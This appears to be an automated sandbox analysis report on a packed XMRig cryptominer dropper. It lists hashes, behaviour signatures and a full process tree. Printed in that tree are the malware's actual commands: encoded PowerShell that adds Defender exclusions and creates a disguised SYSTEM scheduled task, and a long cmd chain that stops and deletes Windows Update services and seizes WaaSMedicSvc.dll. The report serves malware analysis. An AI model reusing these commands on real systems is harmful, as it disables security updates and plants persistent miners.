Analysis

  • max time kernel
    300s
  • max time network
    281s
  • platform
    windows10_x64
  • resource
    win10-20220414-en
  • submitted
    14-07-2022 22:15

General

  • Target

    d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe

  • Size

    7.5MB

  • MD5

    dd9d0dfb0b3d274e3a418084142afcc6

  • SHA1

    ffacc4206b3b84a6d2c105390cf1815e022e02a5

  • SHA256

    d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f

  • SHA512

    d21d35069ddedc02680f8a93f37f4ddb586b0f528bebbe13f1f917de1f9c9e87c79ba29169cd30a65f227c00db52de941d64b43b0727b9809f7f4885a58aa516

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • XMRig Miner payload 2 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Themida packer 8 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe
    "C:\Users\Admin\AppData\Local\Temp\d8f7be97512a74a82bc750146d2bd4db8a8b8a0f72f6baca474cbc427ad46f4f.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3940
    • C:\Windows\Temp\setup.exe
      "C:\Windows\Temp\setup.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Executes dropped EXE
      • Checks BIOS information in registry
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of WriteProcessMemory
      PID:2420
      • C:\Windows\System32\conhost.exe
        "C:\Windows\System32\conhost.exe" "C:\Windows\Temp\setup.exe"
        3⤵
        • Drops file in Drivers directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:64
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdwB4AGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBvAGgAdwAjAD4A"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:988
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AZwBvACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAJwAgAC0AQQByAGcAdQBtAGUAbgB0ACAAJwAtAEUAbgBjAG8AZABlAGQAQwBvAG0AbQBhAG4AZAAgACIAUABBAEEAagBBAEcAbwBBAGEAZwBCAHIAQQBDAE0AQQBQAGcAQQBnAEEARgBNAEEAZABBAEIAaABBAEgASQBBAGQAQQBBAHQAQQBGAEEAQQBjAGcAQgB2AEEARwBNAEEAWgBRAEIAegBBAEgATQBBAEkAQQBBAHQAQQBFAFkAQQBhAFEAQgBzAEEARwBVAEEAVQBBAEIAaABBAEgAUQBBAGEAQQBBAGcAQQBDAGMAQQBRAHcAQQA2AEEARgB3AEEAVQBBAEIAeQBBAEcAOABBAFoAdwBCAHkAQQBHAEUAQQBiAFEAQQBnAEEARQBZAEEAYQBRAEIAcwBBAEcAVQBBAGMAdwBCAGMAQQBFAGMAQQBiAHcAQgB2AEEARwBjAEEAYgBBAEIAbABBAEYAdwBBAFEAdwBCAG8AQQBIAEkAQQBiAHcAQgB0AEEARwBVAEEAWABBAEIAMQBBAEgAQQBBAFoAQQBCAGgAQQBIAFEAQQBaAFEAQgB5AEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDADAAQQBWAGcAQgBsAEEASABJAEEAWQBnAEEAZwBBAEYASQBBAGQAUQBCAHUAQQBFAEUAQQBjAHcAQQBnAEEARAB3AEEASQB3AEIAMQBBAEcARQBBAGMAUQBBAGoAQQBEADQAQQAiACcAKQAgADwAIwB0AHIAaAAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAHQAbAAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAHUAdABrAGUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwB6AGIAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABzAGUAdAB1AHAALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwBhAGMAdgAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAagBvAHgAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="
          4⤵
          • Drops file in Program Files directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4084
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1392
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3760
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\run.bat" "
      2⤵
        PID:1308
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Windows\Temp\lol.bat" "
        2⤵
        • Checks computer location settings
        PID:2720
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
      1⤵
      • Drops startup file
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:1308
    • C:\Windows\system32\sc.exe
      sc stop UsoSvc
      1⤵
      • Launches sc.exe
      PID:1812
    • C:\Windows\system32\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1592
    • C:\Windows\system32\sc.exe
      sc stop bits
      1⤵
      • Launches sc.exe
      PID:216
    • C:\Windows\system32\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2252
    • C:\Windows\system32\sc.exe
      sc stop dosvc
      1⤵
      • Launches sc.exe
      PID:1040
    • C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
      1⤵
      • Modifies registry key
      PID:1428
    • C:\Windows\system32\icacls.exe
      icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
      1⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      PID:1196
    • C:\Windows\system32\takeown.exe
      takeown /f C:\Windows\System32\WaaSMedicSvc.dll
      1⤵
      • Possible privilege escalation attempt
      • Modifies file permissions
      • Suspicious use of AdjustPrivilegeToken
      PID:3248
    • C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
      1⤵
      • Modifies registry key
      PID:2144
    • C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
      1⤵
      • Modifies registry key
      PID:1212
    • C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
      1⤵
      • Modifies security service
      • Modifies registry key
      PID:3744
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      PID:4144
    • C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
      1⤵
      • Modifies registry key
      PID:4220
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Drops file in Windows directory
      • Modifies Internet Explorer settings
      • Modifies registry class
      PID:4360
    • C:\Windows\system32\schtasks.exe
      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
      1⤵
        PID:4340
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
        1⤵
          PID:4524
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          1⤵
            PID:4620
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAGoAagBrACMAPgAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwAgADwAIwB1AGEAcQAjAD4A"
            1⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:4684
            • C:\Program Files\Google\Chrome\updater.exe
              "C:\Program Files\Google\Chrome\updater.exe"
              2⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4908
              • C:\Windows\System32\conhost.exe
                "C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"
                3⤵
                • Drops file in Drivers directory
                • Drops file in System32 directory
                • Suspicious use of SetThreadContext
                • Drops file in Program Files directory
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                PID:4168
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdABzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAagBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAdwB4AGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdwBvAGgAdwAjAD4A"
                  4⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4300
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe yaczcwmfonlx1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqN5dCL6SdfpGQxdbsBsqueaxRnQzTx2Bqmg+8Hm/cXMESqb4c3Os26fGj23Hqsnl0qmcpNr8N8RD0Uj65Is/XzsC3UFIPpYz7Zp9mKjXqYW+xHlpEMJ8pitovpD3AlrEcYhafjTHJIBsyQCmYqS8DwlNaC3+8ctTQ5gWGWPwhQ4m7w5ntgK8u6m/StfnNPDdr+VwS4s25pICn3Q/Dq0WEk/j+SBlrEi93dXqUBShtLfUbnT4w5YQhLxDVbXc7xoFDIPd01rv+1vwAaan4sl2k1YkrvCpkMy2cu5BYO8sYd8sc8dLcQPq/swWuhKRRVQuprYmKwuUqhwRP67Zf25Cl8bcGQHQgT6vgy/6HYtv8SPnEokOLbkto/HrPVPk3hf3Z
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4248
                • C:\Windows\System32\conhost.exe
                  C:\Windows\System32\conhost.exe "nniaxtfqr"
                  4⤵
                    PID:4940
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                    4⤵
                      PID:4548
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                      4⤵
                        PID:4472
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                  1⤵
                    PID:4568
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                    1⤵
                      PID:4504
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                      1⤵
                        PID:4480
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                        1⤵
                          PID:4460
                        • C:\Windows\system32\reg.exe
                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                          1⤵
                          • Modifies registry key
                          PID:4316
                        • C:\Windows\system32\reg.exe
                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                          1⤵
                          • Modifies registry key
                          PID:4300
                        • C:\Windows\system32\reg.exe
                          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                          1⤵
                          • Modifies registry key
                          PID:4268
                        • C:\Windows\system32\reg.exe
                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                          1⤵
                          • Modifies registry key
                          PID:2636
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -standby-timeout-dc 0
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1020
                        • C:\Windows\system32\browser_broker.exe
                          C:\Windows\system32\browser_broker.exe -Embedding
                          1⤵
                          • Modifies Internet Explorer settings
                          PID:3740
                        • C:\Windows\system32\sc.exe
                          sc stop wuauserv
                          1⤵
                          • Launches sc.exe
                          PID:2700
                        • C:\Windows\system32\powercfg.exe
                          powercfg /x -hibernate-timeout-ac 0
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1196
                        • C:\Windows\system32\sc.exe
                          sc stop WaaSMedicSvc
                          1⤵
                          • Launches sc.exe
                          PID:2388
                        • C:\Windows\system32\reg.exe
                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                          1⤵
                          • Modifies registry key
                          PID:4064
                        • C:\Windows\system32\icacls.exe
                          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                          1⤵
                          • Possible privilege escalation attempt
                          • Modifies file permissions
                          PID:4948
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                          1⤵
                            PID:2684
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                            1⤵
                              PID:4116
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                              1⤵
                                PID:5092
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                                1⤵
                                  PID:5084
                                • C:\Windows\system32\schtasks.exe
                                  SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                                  1⤵
                                    PID:5004
                                  • C:\Windows\system32\schtasks.exe
                                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                                    1⤵
                                      PID:4712
                                    • C:\Windows\system32\schtasks.exe
                                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                                      1⤵
                                        PID:4864
                                      • C:\Windows\system32\reg.exe
                                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                                        1⤵
                                        • Modifies registry key
                                        PID:4840
                                      • C:\Windows\system32\reg.exe
                                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                                        1⤵
                                        • Modifies registry key
                                        PID:4780
                                      • C:\Windows\system32\reg.exe
                                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                                        1⤵
                                        • Modifies registry key
                                        PID:4756
                                      • C:\Windows\system32\reg.exe
                                        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                                        1⤵
                                        • Modifies registry key
                                        PID:4964
                                      • C:\Windows\system32\powercfg.exe
                                        powercfg /x -standby-timeout-dc 0
                                        1⤵
                                          PID:4892
                                        • C:\Windows\system32\takeown.exe
                                          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                          1⤵
                                          • Possible privilege escalation attempt
                                          • Modifies file permissions
                                          PID:4844
                                        • C:\Windows\system32\reg.exe
                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                                          1⤵
                                          • Modifies registry key
                                          PID:4836
                                        • C:\Windows\system32\reg.exe
                                          reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                                          1⤵
                                          • Modifies registry key
                                          PID:4752
                                        • C:\Windows\system32\powercfg.exe
                                          powercfg /x -standby-timeout-ac 0
                                          1⤵
                                            PID:2700
                                          • C:\Windows\system32\reg.exe
                                            reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                                            1⤵
                                            • Modifies registry key
                                            PID:4092
                                          • C:\Windows\system32\powercfg.exe
                                            powercfg /x -hibernate-timeout-dc 0
                                            1⤵
                                              PID:4696
                                            • C:\Windows\system32\reg.exe
                                              reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                                              1⤵
                                              • Modifies registry key
                                              PID:3992
                                            • C:\Windows\system32\powercfg.exe
                                              powercfg /x -hibernate-timeout-ac 0
                                              1⤵
                                                PID:216
                                              • C:\Windows\system32\sc.exe
                                                sc stop dosvc
                                                1⤵
                                                • Launches sc.exe
                                                PID:3736
                                              • C:\Windows\system32\sc.exe
                                                sc stop bits
                                                1⤵
                                                • Launches sc.exe
                                                PID:2136
                                              • C:\Windows\system32\sc.exe
                                                sc stop wuauserv
                                                1⤵
                                                • Launches sc.exe
                                                PID:3324
                                              • C:\Windows\system32\sc.exe
                                                sc stop WaaSMedicSvc
                                                1⤵
                                                • Launches sc.exe
                                                PID:1812
                                              • C:\Windows\system32\sc.exe
                                                sc stop UsoSvc
                                                1⤵
                                                • Launches sc.exe
                                                PID:3748
                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                1⤵
                                                • Modifies registry class
                                                PID:4480
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc
                                                1⤵
                                                  PID:4340
                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                  1⤵
                                                  • Modifies registry class
                                                  PID:4404
                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                  1⤵
                                                  • Modifies registry class
                                                  PID:220

                                                Network

